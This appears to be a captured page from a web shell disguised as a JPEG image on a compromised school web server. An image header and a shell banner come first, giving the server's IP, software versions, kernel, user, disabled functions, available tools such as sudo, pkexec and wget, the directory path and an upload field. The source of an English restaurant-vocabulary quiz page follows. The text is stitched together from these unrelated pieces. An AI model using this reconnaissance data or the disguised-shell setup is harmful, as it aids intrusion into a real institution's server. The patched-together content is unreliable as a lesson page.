????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.135.224.139 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelE/Category3/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>Choose the right answer</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style type="text/css"> svg { position: absolute; background-color: transparent; } </style> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No3); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No3, 18), true, true); shared_setFooterTable('id_tblFooter', true, true, true, true, true); var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3', 'id_td_heading4', 'id_td_heading5', 'id_td_heading6', 'id_td_heading7', 'id_td_heading8', 'id_td_heading9', 'id_td_heading10']; var ids_tds = ['id_td1Set1', 'id_td2Set1', 'id_td1Set2', 'id_td2Set2', 'id_td1Set3', 'id_td2Set3', 'id_td1Set4', 'id_td2Set4', 'id_td1Set5', 'id_td2Set5', 'id_td1Set6', 'id_td2Set6', 'id_td1Set7', 'id_td2Set7', 'id_td1Set8', 'id_td2Set8', 'id_td1Set9', 'id_td2Set9']; var ids_All = ids_headings.concat(ids_tds); shared_adjust_fontSize_for_ids_all_devices(ids_All, 80); var id_tables_array = ['id_table1', 'id_table2', 'id_table3', 'id_table4', 'id_table5', 'id_table6', 'id_table7', 'id_table8', 'id_table9', 'id_table10']; shared_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { setAllSvgsWidthHeightAndPositionFromTds(); setAllEllipseStyles(); } function setAllSvgsWidthHeightAndPositionFromTds() { var nTds = 2; for (var nthSet = 1; nthSet <= 9; nthSet++) { for (var nthTd = 1; nthTd <= nTds; nthTd++) { shared_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd + 'Set' + nthSet, 'id_svg' + nthTd + 'Set' + nthSet); } } } function setAllEllipseStyles() { var allEllipseIdsArray = getAllSetsEllipseIdsArray(); for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++) { var id_ellipse = allEllipseIdsArray[indexEllipse]; shared_svg_setEllipseStyle(id_ellipse); } } function getAllSetsEllipseIdsArray() { var allEllipseIdsArray = new Array(); for (var nthSet = 1; nthSet <= 9; nthSet++) { for (var nthEllipse = 1; nthEllipse <= 2; nthEllipse++) { allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set' + nthSet); } } return (allEllipseIdsArray); } function ellipse_click(id_ellipse) { var set1IdsArray = ['id_ellipse1Set1', 'id_ellipse2Set1']; var set2IdsArray = ['id_ellipse1Set2', 'id_ellipse2Set2']; var set3IdsArray = ['id_ellipse1Set3', 'id_ellipse2Set3']; var set4IdsArray = ['id_ellipse1Set4', 'id_ellipse2Set4']; var set5IdsArray = ['id_ellipse1Set5', 'id_ellipse2Set5']; var set6IdsArray = ['id_ellipse1Set6', 'id_ellipse2Set6']; var set7IdsArray = ['id_ellipse1Set7', 'id_ellipse2Set7']; var set8IdsArray = ['id_ellipse1Set8', 'id_ellipse2Set8']; var set9IdsArray = ['id_ellipse1Set9', 'id_ellipse2Set9']; var allGroupsIdsArrayArray = [set1IdsArray, set2IdsArray, set3IdsArray, set4IdsArray, set5IdsArray, set6IdsArray, set7IdsArray, set8IdsArray, set9IdsArray]; shared_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray); } function btnValidate_click() { var allEllipseIdsArray = getAllSetsEllipseIdsArray(); var correctEllipseIdsArray = ['id_ellipse1Set1', 'id_ellipse2Set2', 'id_ellipse2Set3', 'id_ellipse2Set4', 'id_ellipse2Set5', 'id_ellipse1Set6', 'id_ellipse2Set7', 'id_ellipse1Set8', 'id_ellipse1Set9']; var nCorrectEllipses = shared_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray); if (nCorrectEllipses == 9) { shared_show_claps_animation('shared_id_div_claps_image'); } } function btnPrevious_click() { window.location = 'LevelECat3Lesson17.html'; } function btnNext_click() { window.location = 'LevelECat3Lesson19.html'; } function btnHome_click() { shared_btnHomeCategories_click('LevelE'); } </script> </head> <body onLoad="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%"> <tr height="*"> <td align="center" style="padding-bottom: 0px"> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading1" class="shared_style_options_blue_24px_bold" style="border-bottom:none">Choose the right answer [click to show with ellipse] </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading2" class="shared_style_options_blue_24px_bold" style="border-bottom:none">1. A person who serves you in the restaurant is </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set1" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> waiter <svg id="id_svg1Set1" style="visibility: hidden"> <ellipse id="id_ellipse1Set1" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set1" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> servant <svg id="id_svg2Set1" style="visibility: hidden"> <ellipse id="id_ellipse2Set1" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading3" class="shared_style_options_blue_24px_bold" style="border-bottom:none">2. A cook in the restaurant is called </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set2" class="shared_style_black_24px_bold" width="50%" style="text-align:center" > cooker <svg id="id_svg1Set2" style="visibility: hidden"> <ellipse id="id_ellipse1Set2" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set2" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> chef <svg id="id_svg2Set2" style="visibility: hidden"> <ellipse id="id_ellipse2Set2" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table4" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" > <tr height="20%"> <td id="id_td_heading4" class="shared_style_options_blue_24px_bold" style="border-bottom:none">3. The ...... tells you that what food is available. </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set3" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> list <svg id="id_svg1Set3" style="visibility: hidden"> <ellipse id="id_ellipse1Set3" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set3" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> menu <svg id="id_svg2Set3" style="visibility: hidden"> <ellipse id="id_ellipse2Set3" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table5" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading5" class="shared_style_options_blue_24px_bold" style="border-bottom:none">4. The extra money you pay to the waiter is </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set4" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> fare <svg id="id_svg1Set4" style="visibility: hidden"> <ellipse id="id_ellipse1Set4" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set4" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> tip <svg id="id_svg2Set4" style="visibility: hidden"> <ellipse id="id_ellipse2Set4" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table6" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading6" class="shared_style_options_blue_24px_bold" style="border-bottom:none">5. We should say________ while leaving </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set5" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> sorry <svg id="id_svg1Set5" style="visibility: hidden"> <ellipse id="id_ellipse1Set5" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set5" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> thank you <svg id="id_svg2Set5" style="visibility: hidden"> <ellipse id="id_ellipse2Set5" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table7" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading7" class="shared_style_options_blue_24px_bold" style="border-bottom:none">6. Variety of food is placed in common area </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set6" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> buffet <svg id="id_svg1Set6" style="visibility: hidden"> <ellipse id="id_ellipse1Set6" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set6" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> dinner <svg id="id_svg2Set6" style="visibility: hidden"> <ellipse id="id_ellipse2Set6" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table8" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading8" class="shared_style_options_blue_24px_bold" style="border-bottom:none">7. We use this to rinse our fingers after eating </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set7" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> fish bowl <svg id="id_svg1Set7" style="visibility: hidden"> <ellipse id="id_ellipse1Set7" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set7" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> finger bowl <svg id="id_svg2Set7" style="visibility: hidden"> <ellipse id="id_ellipse2Set7" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center"> <table id="id_table9" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading9" class="shared_style_options_blue_24px_bold" style="border-bottom:none">8. We use ________ to wipe our hands after washing </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set8" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> napkins <svg id="id_svg1Set8" style="visibility: hidden"> <ellipse id="id_ellipse1Set8" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set8" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> newspaper <svg id="id_svg2Set8" style="visibility: hidden"> <ellipse id="id_ellipse2Set8" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="10.5%"> <td align="center"> <table id="id_table10" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_heading10" class="shared_style_options_blue_24px_bold" style="border-bottom:none">9. Forks, spoons and knives are called </td> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td1Set9" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> cutlery <svg id="id_svg1Set9" style="visibility: hidden"> <ellipse id="id_ellipse1Set9" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> <td id="id_td2Set9" class="shared_style_black_24px_bold" width="50%" style="text-align:center"> crockery <svg id="id_svg2Set9" style="visibility: hidden"> <ellipse id="id_ellipse2Set9" cx="50%" cy="51%" rx="22%" ry="35%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); </script> </body> </html>